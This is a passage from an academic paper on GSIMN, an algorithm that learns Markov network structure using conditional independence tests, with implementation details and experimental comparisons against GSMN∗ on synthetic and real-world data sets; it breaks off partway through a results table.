IGSIMN.). In particular, if, for some variable Y , the algorithm reaches line 24, i.e., pXY ≤ α and IGSIMN(X, Y, S) = false, then X and all the variables that were found dependent with X before Y (i.e., all variables currently in S) are promoted to the beginning of the grow order λY . This is illustrated in Figure 5 for variable 7, which depicts the grow phase of two consecutively examined variables 5 and 7. In this figure, the curved edges show the tests that are inferred by IGSIMN during the grow phase of variable 5. The grow order of 7 changes from λ7 = [2, 6, 3, 0, 4, 1, 5] to λ7 = [3, 4, 6, 5, 2, 0, 1] after the grow phase of variable 5 is complete because the variables 5, 6, 4 and 3 were promoted (in that order) to the beginning of the queue. The rationale for this is the observation that this increases the number of tests inferred by GSIMN at the next step: The change in the examination and grow orders described above was chosen so that the inferred tests while learning the blanket of variable 7 match exactly those required by the algorithm in some future step. In 464 Efficient Markov Network Structure Discovery Using Independence Tests particular, note that in the example the set of inferred dependencies between each variable found dependent with 5 before 7 are exactly those required during initial part of the grow phase of variable 7, shown highlighted in Figure 5(b) (the first four dependencies). These independence tests were inferred (not conducted), resulting in computational savings. In general, the last dependent variable of the grow phase of X has the maximum number of dependences and independences inferred and this provides the rationale for its change in grow order and its selection by the algorithm to be examined next. It can be shown that under the same assumptions as GSMN∗, the structure returned by GSIMN is the correct one i.e., each set BX computed by the GSIMN algorithm equals exactly the neighbors of X. The proof of correctness of GSIMN is based on correctness of GSMN∗ and is presented in Appendix B. 4.6 GSIMN Technical Implementation Details In this section we discuss a number of practical issues that subtly influence the accuracy and efficiency of an implementation of GSIMN. One is the order of application of the I-SU, D-SU, I-Triangle and D-Triangle rules within the function IGSIMN. Given an independence-query oracle, the order of application should not matter—assuming there are more than one rules for inferring the value of an independence, all of them are guaranteed to produce the same value due to the soundness of the axioms of Eqs. (1) (Pearl, 1988). In practice however, the oracle is implemented by statistical tests conducted on data which can be incorrect, as previously mentioned. Of particular importance is the observation that false independences are more likely to occur than false dependencies. One example of this is the case where the domain dependencies are weak—in this case any pair of variables connected (dependent) in the underlying true network structure may be incorrectly deemed independent if all paths between them are long enough. On the other hand, false dependencies are much more rare— the confidence threshold of 1−α = 0.95 of a statistical test tells us that the probability of a false dependence by chance alone is only 5%. Assuming i.i.d. data for each test, the chance of multiple false dependencies is even lower, decreasing exponentially fast. This practical observation i.e., that dependencies are typically more reliable than independences, provide the rationale for the way the IGSIMN algorithm works. In particular, IGSIMN prioritizes the application of rules whose antecedents contain dependencies first i.e., the D-Triangle and D-SU rules, followed by the I-Triangle and I-SU rules. In effect, this uses statistical results that are typically known with greater confidence before ones that are usually less reliable. The second practical issue concerns efficient inference. The GSIMN algorithm uses a one- step inference procedure (shown in Algorithm 5) that utilizes a knowledge base K = {KXY } containing known independences and dependences for each pair of variables X and Y . To implement this inference efficiently we utilize a data structure for K for the purpose of storing and retrieving independence facts in constant time. It consists of two 2D arrays, one for dependencies and another for independencies. Each array is of n × n size, where n is the number of variables in the domain. Each cell in this array corresponds to a pair of variables (X, Y ), and stores the known independences (dependences) between X and Y in the form of a list of conditioning sets. For each conditioning set Z in the list, the knowledge base KXY represents a known independence (X⊥⊥Y | Z) (dependence (X 6⊥⊥Y | Z)). It is important to note that the length of each list is at most 2, as there are no more than two 465 Bromberg, Margaritis, & Honavar tests done between any variable X and Y during the execution of GSIMN (done during the growing and shrinking phases). Thus, it always takes a constant time to retrieve/store an independence (dependence), and therefore all inferences using the knowledge base are constant time as well. Also note that all uses of the Strong Union axion by the IGSIMN algorithm are constant time as well, as they can be accomplished by testing the (at most two) sets stored in KXY for subset or superset inclusion. 5. Experimental Results We evaluated the GSMN∗ and GSIMN algorithms on both artificial and real-world data sets. Through the experimental results presented below we show that the simple application of Pearl’s inference rules in GSIMN algorithm results in a significant reduction in the number of tests performed when compared to GSMN∗ without adversely affecting the quality of the output network. In particular we report the following quantities: • Weighted number of tests. The weighted number of tests is computed by the summation of the weight of each test executed, where the weight of test (X, Y | Z) is defined as 2+|Z|. This quantity reflects the time complexity of the algorithm (GSMN∗ or GSIMN) and can be used to assess the benefit in GSIMN of using inference instead of executing statistical tests on data. This is the standard method of comparison of independence-based algorithms and it is justified by the observation that the running time of a statistical test on triplet (X, Y | Z) is proportional to the size N of the data set and the number of variables involved in it i.e., O(N (|Z|+2)) (and is not exponential in the number of variables involved as a näıve implementation might assume). This is because one can construct all non-zero entries in the contingency table used by the test by examining each data point in the data set exactly once, in time proportional to the number of variables involved in the test i.e., proportional to |{X, Y }∪Z| = 2+|Z|. • Execution time. In order to assess the impact of inference in the running time (in addition to the impact of statistical tests), we report the execution time of the algorithm. • Quality of the resulting network. We measure quality in two ways. – Normalized Hamming distance. The Hamming distance between the output network and the structure of the underlying model is another measure of the quality of the output network, when the actual network that was used to generate the data is known. The Hamming distance is defined as the number of “reversed” edges between these two network structures, i.e., the number of times an actual edge in the true network is missing in the returned network or an edge absent from the true network exists in the algorithm’s output network. A value zero means that the output network has the correct structure. To be able to compare domains of different dimensionalities (number of variables n) we normalize it by ( n 2 ) , the total number of node pairs in the corresponding domain. – Accuracy. For real-world data sets where the underlying network is unknown, no Hamming distance calculation is possible. In this case it is impossible to know the true value of any independence. We therefore approximate it by a statistical test on the entire data set, and use a limited, randomly chosen subset (1/3 of the data set) to learn the network. To measure accuracy we compare the result 466 Efficient Markov Network Structure Discovery Using Independence Tests (true or false) of a number of conditional independence tests on the network output (using vertex separation), to the same tests performed on the full data set. In all experiments involving data sets we used the χ2 statistical test for estimation of conditional independences. As mentioned above, rules of thumb exist that deem certain tests as potentially unreliable depending on the counts of the contingency table involved; for example, one such rule Cochran (1954) deems a test unreliable if more than 20% of the cells of the contingency table have less than 5 data points the test. Due to the requirement that an answer must be obtained by an independence algorithm conducting a test, we used the outcomes of such tests as well in our experiments. The effect of these possibly unreliable tests on the quality of the resulting network is measured by our accuracy measures, listed above. In the next section we present results for domains in which the underlying probabilistic model is known. This is followed by real-world data experiments where no model structure is available. 5.1 Known-Model Experiments In the first set of experiments the underlying model, called the true model or true network, is a known Markov network. The purpose of this set of experiments is to conduct a controlled evaluation of the quality of the output network through a systematic study of the algorithms’ behavior under varying conditions of domain size (number of variables) and amount of dependencies (average node degree in the network). Each true network that contains n variables was generated randomly as follows: the network was initialized with n nodes and no edges. A user-specified parameter of the network structure is the average node degree τ that equals the average number of neighbors per node. Given τ , for every node its set of neighbors was determined randomly and uniformly by selecting the first τ n 2 pairs in a random permutation of all possible pairs. The factor 1/2 is necessary because each edge contributes to the degree of two nodes. We conducted two types of experiments using known network structure: Exact learning experiments and sample-based experiments. 5.1.1 Exact Learning Experiments In this set of known-model experiments, we assume that the result of all statistical queries asked by the GSMN∗ and GSIMN algorithms were available, which assumes the existence of an oracle that can answer independence queries. When the underlying model is known, this oracle can be implemented through vertex separation. The benefits of querying the true network for independence are two: First, it ensures faithfulness and correctness of the independence query results, which allows the evaluation of the algorithms under their assumptions for correctness. Second, these tests can be performed much faster than actual statistical tests on data. This allowed us to evaluate our algorithms in large networks—we were able to conduct experiments of domains containing up to 100 variables. We first report the weighted number of tests executed by GSMN∗ with and without propagation and GSIMN. Our results are summarized in Figure 6, which shows the ratio between the weighted number of tests of GSIMN and the two versions of GSMN∗. One 467 Bromberg, Margaritis, & Honavar 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 10 20 30 40 50 60 70 80 90 100 W C (G S IM N ) / W C (G S M N * w ith p ro p a g a tio n ) Domain size (number of variables) Ratio of weighted cost of GSIMN vs. GSMN* without propagation τ = 1 τ = 2 τ = 4 τ = 8 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 10 20 30 40 50 60 70 80 90 100W C (G S IM N ) / W C (G S M N * w ith o u t p ro p a g a tio n ) Domain size (number of variables) Ratio of weighted cost of GSIMN vs. GSMN* with propagation τ = 1 τ = 2 τ = 4 τ = 8 Figure 6: Ratio of the weighted number of tests of GSIMN over GSMN∗ without propaga- tion (left plot) and with propagation (right plot) for network sizes (number of nodes) up to n = 100 of average degree τ = 1, 2, 4, and 8. Algorithm 6 IFCH(X, Y, S, F, T). Forward-chaining implementation of independence test IGSIMN(X, Y, S, F, T). 1: /* Query knowledge base. */ 2: if ∃(S, t) ∈ KXY then 3: return t 4: t ← result of test (X, Y | S) /* t = true iff test (X, Y | S) returns independence. */ 5: Add (S, t) to KXY and KY X . 6: Run forward-chaining inference algorithm on K, update K. 7: return t hundred true networks were generated randomly for each pair (n, τ ), and the figure shows the mean value. We can see that the limiting reduction (as n grows large) in weighted number of tests depends primarily on the average degree parameter τ . The reduction of GSIMN for large n and dense networks (τ = 8) is approximately 40% compared to GSMN∗ with propagation and 75% compared to GSMN∗ without the propagation optimization, demonstrating the benefit of GSIMN vs. GSMN∗ in terms of number of tests executed. One reasonable question about the performance of GSIMN is to what extent its inference procedure is complete i.e., from all those tests that GSIMN needs during its operation, how does the number of tests that it infers (by applying a single step of backward chaining on the Strong Union axiom and the Triangle theorem, rather than executing a statistical test on data) compare to the number of tests that can be inferred (for example using a complete automated theorem prover on Eqs. (1))? To measure this, we compared the number of tests done by GSIMN with the number done by an alternative algorithm, which we call GSIMN- FCH (GSIMN with Forward Chaining). GSIMN-FCH differs from GSIMN in function IFCH, shown in Algorithm 6, which replaces function IGSIMN of GSIMN. IFCH exhaustively produces all independence statements that can be inferred through the properties of Eqs. (1) using a forward-chaining procedure. This process iteratively builds a knowledge base K containing the truth value of conditional independence predicates. Whenever the outcome of a test is required, K is queried (line 2 of IFCH in Algorithm 6). If the value of the test is 468 Efficient Markov Network Structure Discovery Using Independence Tests 0 0.2 0.4 0.6 0.8 1 1.2 1.4 121212121111111110101010999988877766655544332 Ratio of Number of tests GSIMN-FCH and GSIMN R a tio Number of variables (n) τ = 1 τ = 2 τ = 4 τ = 8 Figure 7: Ratio of number of tests of GSIMN-FCH over GSIMN for network sizes (number of variables) n = 2 to n = 13 and average degrees τ = 1, 2, 4, and 8. found in K, it is returned (line 3). If not, GSIMN-FCH performs the test and uses the result in a standard forward-chaining automatic theorem prover subroutine (line 6) to produce all independence statements that can be inferred by the test result and K, adding these new facts to K. A comparison of the number of tests executed by GSIMN vs. GSIMN-FCH is presented in Figure 7, which shows the ratio of the number of tests of GSIMN over GSIMN-FCH. The figure shows the mean value over four runs, each corresponding to a network generated randomly for each pair (n, τ ), for τ = 1, 2, 4 and 8 and n up to 12. Unfortunately, after two days of execution GSIMN-FCH was unable to complete execution on domains containing 13 variables or more. We therefore present results for domain sizes up to 12 only. The figure shows that for n ≥ 9, and every τ the ratio is exactly 1 i.e., all tests inferable were produced by the use of the Triangle theorem in GSIMN. For smaller domains, the ratio is above 0.95 with the exception of a single case, (n = 5, τ = 1). 5.1.2 Sample-based Experiments In this set of experiments we evaluate GSMN∗ (with and without propagation) and GSIMN on data sampled from the true model. This allows a more realistic assessment of the performance of our algorithms. The data were sampled from the true (known) Markov network using Gibbs sampling. In the exact learning experiments of the previous section only the structure of the true network was required, generated randomly in the fashion described above. To sample data from a known structure however, one also needs to specify the network parameters. For each random network, the parameters determine the strength of dependencies among connected variables in the graph. Following Agresti (2002), we used the log-odds ratio as a measure of the strength of the probabilistic influence between two binary variables X and Y , defined as θXY = log Pr(X = 0, Y = 0) Pr(X = 1, Y = 1) Pr(X = 0, Y = 1) Pr(X = 1, Y = 0) . 469 Bromberg, Margaritis, & Honavar 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 1, θ = 1.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 1, θ = 1.5 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 1, θ = 2.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 2, θ = 1.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 2, θ = 1.5 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 2, θ = 2.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 4, θ = 1.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 4, θ = 1.5 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 4, θ = 2.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 8, θ = 1.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 8, θ = 1.5 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 50, τ = 8, θ = 2.0 GSMN* without propagation GSMN* with propagation GSIMN Figure 8: Normalized Hamming distances between the true network and the network output by GSMN∗ (with and without propagation) and GSIMN for domain size n = 50 and average degrees τ = 1, 2, 4, 8. The network parameters were generated randomly so that the log-odds ratio between every pair of variables connected by an edge in the graph has a specified value. In this set of experiments, we used values of θ = 1, θ = 1.5 and θ = 2 for every such pair of variables in the network. Figures 8 and 9 show plots of the normalized Hamming distance between the true network and that output by the GSMN∗ (with and without propagation) and GSIMN for domain sizes of n = 50 and n = 75 variables, respectively. These plots show that the Hamming distance of GSIMN is comparable to the ones of the GSMN∗ algorithms for both 470 Efficient Markov Network Structure Discovery Using Independence Tests 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 1, θ = 1.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 1, θ = 1.5 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 1, θ = 2.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 2, θ = 1.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 2, θ = 1.5 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 2, θ = 2.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 4, θ = 1.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 4, θ = 1.5 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 4, θ = 2.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 8, θ = 1.0 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 8, θ = 1.5 GSMN* without propagation GSMN* with propagation GSIMN 0 0.2 0.4 0.6 0.8 1 0 2 4 6 8 10 12 14 16 18 20 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for sampled data n = 75, τ = 8, θ = 2.0 GSMN* without propagation GSMN* with propagation GSIMN Figure 9: Normalized Hamming distance results as in Figure 8 but for domain size n = 75. domain sizes n = 50 and n = 75, all average degrees τ = 1, 2, 4, 8 and log-odds ratios θ = 1, θ = 1.5 and θ = 2. This reinforces the claim that inference done by GSIMN has a small impact on the quality of the output networks. Figure 10 shows the weighted number of tests of GSIMN vs. GSMN∗ (with and without propagation) for a sampled data set of 20,000 points for domains n = 50, and n = 75, average degree parameters τ = 1, 2, 4, and 8 and log-odds ratios θ = 1, 1.5 and 2. GSIMN shows a reduced weighted number of tests with respect to GSMN∗ without propagation in all cases and compared to GSMN∗ with propagation in most cases (with the only exceptions of (τ = 4, θ = 2) and (τ = 8, θ = 1.5)). For sparse networks and weak dependences i.e., τ = 1, this reduction is larger than 50% for both domain sizes, a reduction much larger 471 Bromberg, Margaritis, & Honavar 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 1, θ = 1.0, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 1, θ = 1.5, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 1, θ = 2.0, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 2, θ = 1.0, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 2, θ = 1.5, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 2, θ = 2.0, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 4, θ = 1.0, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 4, θ = 1.5, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 4, θ = 2.0, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 8, θ = 1.0, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 8, θ = 1.5, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN 0 50000 100000 150000 200000 250000 300000 50 75 W e ig h te d n u m b e r o f te st s Number of variables Weighted cost for sampled data τ = 8, θ = 2.0, 20,000 data points GSMN* without propagation GSMN* with propagation GSIMN Figure 10: Weighted number of tests executed by GSMN∗ (with and without propagation) and GSIMN for |D| = 20, 000, for domains sizes n = 50 and 75, average degree parameters τ = 1, 2, 4, and 8, and log-odds ratios θ = 1, 1, 5, and 2. than the one observed for the exact learning experiments. The actual execution times for various data set sizes and network densities are shown in Figure 11 for the largest domain of n = 75, and θ = 1, verifying the reduction in cost of GSIMN for various data set sizes. Note that the reduction is proportional to the number of data points; this is reasonable as each test executed must go over the entire data set once to construct the contingency table. This confirms our claim that the cost of inference of GSIMN is small (constant time per test, see discussion in Section 4.6) compared to the execution time of the tests themselves, and indicates increasing cost benefits of the use of GSIMN for even large data sets. 472 Efficient Markov Network Structure Discovery Using Independence Tests 0 50 100 150 200 250 300 0 2000 4000 6000 8000 10000 12000 14000 16000 18000 20000 E xe cu tio n t im e ( se c) Execution times for sampled data sets n = 75 variables, τ = 1, θ = 1 GSMN* without propagation GSMN* with propagation GSIMN 0 50 100 150 200 250 300 0 2000 4000 6000 8000 10000 12000 14000 16000 18000 20000 E xe cu tio n t im e ( se c) Execution times for sampled data sets n = 75 variables, τ = 2, θ = 1 GSMN* without propagation GSMN* with propagation GSIMN 0 50 100 150 200 250 300 0 2000 4000 6000 8000 10000 12000 14000 16000 18000 20000 E xe cu tio n t im e ( se c) Execution times for sampled data sets n = 75 variables, τ = 4, θ = 1 GSMN* without propagation GSMN* with propagation GSIMN 0 50 100 150 200 250 300 0 2000 4000 6000 8000 10000 12000 14000 16000 18000 20000 E xe cu tio n t im e ( se c) Execution times for sampled data sets n = 75 variables, τ = 8, θ = 1 GSMN* without propagation GSMN* with propagation GSIMN Figure 11: Execution times for sampled data experiments for θ = 1, τ = 1, 2 (top row) and τ = 4, 8 (bottom row) for a domain of n = 75 variables. 5.1.3 Real-World Network Sampled Data Experiments We also conducted sampled data experiments on well-known real-world networks. As there is no known repository of Markov networks drawn from real-world domains, we instead utilized well-known Bayesian networks that are widely used in Bayesian network research and are available from a number of repositories.1 To generate Markov networks from these Bayesian network structures we used the process of moralization (Lauritzen, 1996) that consists of two steps: (a) connect each pair of nodes in the Bayesian network that have a common child with an undirected edge and (b) remove directions of all edges. This results in a Markov network in which the local Markov property is valid i.e., each node is conditionally independent of all other nodes in the domain given its direct neighbors. During this procedure some conditional independences may be lost. This, however, does not affect the accuracy results because we compare the independencies of the output network with those of the moralized Markov network (as opposed to the Bayesian network). We conducted experiments using 5 real-world domains: Hailfinder, Insurance, Alarm, Mildew, and Water. For each domain we sampled a varying number of data points from its corresponding Bayesian network using logic sampling (Henrion, 1988), and used it as input to the GSMN∗ (with and without propagation) and GSIMN algorithms. We then compared the network output from each of these algorithms to the original moralized network using the normalized Hamming distance metric previously described. The results are shown in 1. We used http://compbio.cs.huji.ac.il/Repository/. Accessed on December 5, 2008. 473 Bromberg, Margaritis, & Honavar 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 2 4 6 8 10 12 14 16 18 20 22 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for hailfinder data set GSMN* without propagation GSMN* with propagation GSIMN 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 2 4 6 8 10 12 14 16 18 20 22 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for insurance data set GSMN* without propagation GSMN* with propagation GSIMN 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 2 4 6 8 10 12 14 16 18 20 22 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for alarm data set GSMN* without propagation GSMN* with propagation GSIMN 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 2 4 6 8 10 12 14 16 18 20 22 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for Mildew data set GSMN* without propagation GSMN* with propagation GSIMN 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 0 2 4 6 8 10 12 14 16 18 20 22 N o rm a liz e d H a m m in g d is ta n ce Data set size (thousands of data points) Hamming distance for Water data set GSMN* without propagation GSMN* with propagation GSIMN Figure 12: Normalized Hamming distance of the network output by GSMN∗ (with and without propagation) and GSIMN with the true Markov networks network using varying data set sizes sampled from Markov networks for various real-world domains modeled by Bayesian networks. Fig. 12 and indicate that the distances produced from the three algorithms are similar. In some cases (e.g., Water and Hailfinder) the network resulting from the use of GSIMN is actually better (of smaller Hamming distance) than the ones output by the GSMN∗ algorithms. We also measured the weighted cost of the three algorithms for each of these domains, shown in Fig. 13. The plots show a significant decrease in the weighted number of tests for GSIMN with respect to both GSMN∗ algorithms: the cost of GSIMN is 66% of the cost of GSMN∗ without propagation on average, a savings of 34%, while the cost of GSIMN is 28% of the cost of GSMN∗ without propagation on average, a savings of 72%. 5.2 Real-World Data Experiments While the artificial data set studies of the previous section have the advantage of allowing a more controlled and systematic study of the performance of the algorithms, experiments on real-world data are necessary for a more realistic assessment of their performance. Real data are more challenging because they may come from non-random topologies (e.g., a possibly irregular lattice in many cases of spatial data) and the underlying probability distribution may not be faithful. We conducted experiments on a number of data sets obtained from the UCI machine learning data set repository (Newman, Hettich, Blake, & Merz, 1998). Continuous variables in the data sets were discretized using a method widely recommended in introductory statis- tics texts (Scott, 1992); it dictates that the optimal number of equally-spaced discretization bins for each continuous variable is k = 1 + log2 N , where N is the number of points in the 474 Efficient Markov Network Structure Discovery Using Independence Tests 0 10000 20000 30000 40000 50000 60000 70000 80000 0 5 10 15 20 W e ig h te d c o st o f te st s Data set size (thousands of data points) Weighted cost of tests for hailfinder data set GSMN* without propagation GSMN* with propagation GSIMN 0 1000 2000 3000 4000 5000 6000 7000 8000 9000 0 5 10 15 20 W e ig h te d c o st o f te st s Data set size (thousands of data points) Weighted cost of tests for insurance data set GSMN* without propagation GSMN* with propagation GSIMN 0 2000 4000 6000 8000 10000 12000 14000 16000 0 5 10 15 20 W e ig h te d c o st o f te st s Data set size (thousands of data points) Weighted cost of tests for alarm data set GSMN* without propagation GSMN* with propagation GSIMN 0 2000 4000 6000 8000 10000 0 5 10 15 20 W e ig h te d c o st o f te st s Data set size (thousands of data points) Weighted cost of tests for Mildew data set GSMN* without propagation GSMN* with propagation GSIMN 0 5000 10000 15000 20000 25000 0 5 10 15 20 W e ig h te d c o st o f te st s Data set size (thousands of data points) Weighted cost of tests for Water data set GSMN* without propagation GSMN* with propagation GSIMN Figure 13: Weighted cost of tests conducted by the GSMN∗ (with and without propagation) and GSIMN algorithms for various real-world domains modeled by Bayesian networks. -0.2 -0.1 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 19 1 2 14 6 7 12 8 3 13 15 4 5 10 11 18 17 9 16 Data set index Weighted cost and accuracy for real-world data sets acc(GSIMN) - acc(GSMN* without propagation) acc(GSIMN) - acc(GSMN* with propagation) wc(GSIMN) / wc(GSMN* without propagation) wc(GSIMN) / wc(GSMN* with propagation) Figure 14: Ratio of the weighted number of tests of GSIMN versus GSMN∗ and difference between the accuracy of GSIMN and GSMN∗ on real data sets. Ratios smaller that 1 and positive bars indicate an advantage of GSIMN over GSMN∗. The numbers in the x-axis are indices of the data sets as shown in Table 1. data set. For each data set and each algorithm, we report the weighted number of condi- tional independence tests conducted to discover the network and the accuracy, as defined below. 475 Bromberg, Margaritis, & Honavar Table 1: Weighted number of tests and accuracy for several real-world data sets. For each evaluation measure, the best performance between GSMN∗ (with and without propagation) and GSIMN is indicated in bold. The number of variables in the domain is denoted by n and the number of data points in each data set by N . Data set Weighted number of tests Accuracy # Name n N GSMN∗ GSMN∗ GSIMN GSMN∗ GSMN∗ GSIMN (w/o prop.) (w/ prop.) (w/o prop.) (w/ prop.) 1 echocardiogram 14 61 1311 1050 604 0.244 0.244 0.244 2 ecoli 9 336 425 309 187 0.353 0.394 0.411 3 lenses 5 24 60 40 20 0.966 0.966 0.966 4 hayes-roth 6 132 102 72 30 0.852 0.852 0.852 5 hepatitis 20 80 1412 980 392 0.873 0.912 0.968 6 cmc 10 1473 434 292 154 0.746 0.767 0.794 7 balance-scale 5 625 82 47 29 0.498 0.797 0.698 8 baloons 5 20 60 40 20 0.932 0.932 0.932 9 flag 29 194 5335 2787 994 0.300 0.674 0.929 10 tic-tac-toe 10 958 435 291 119 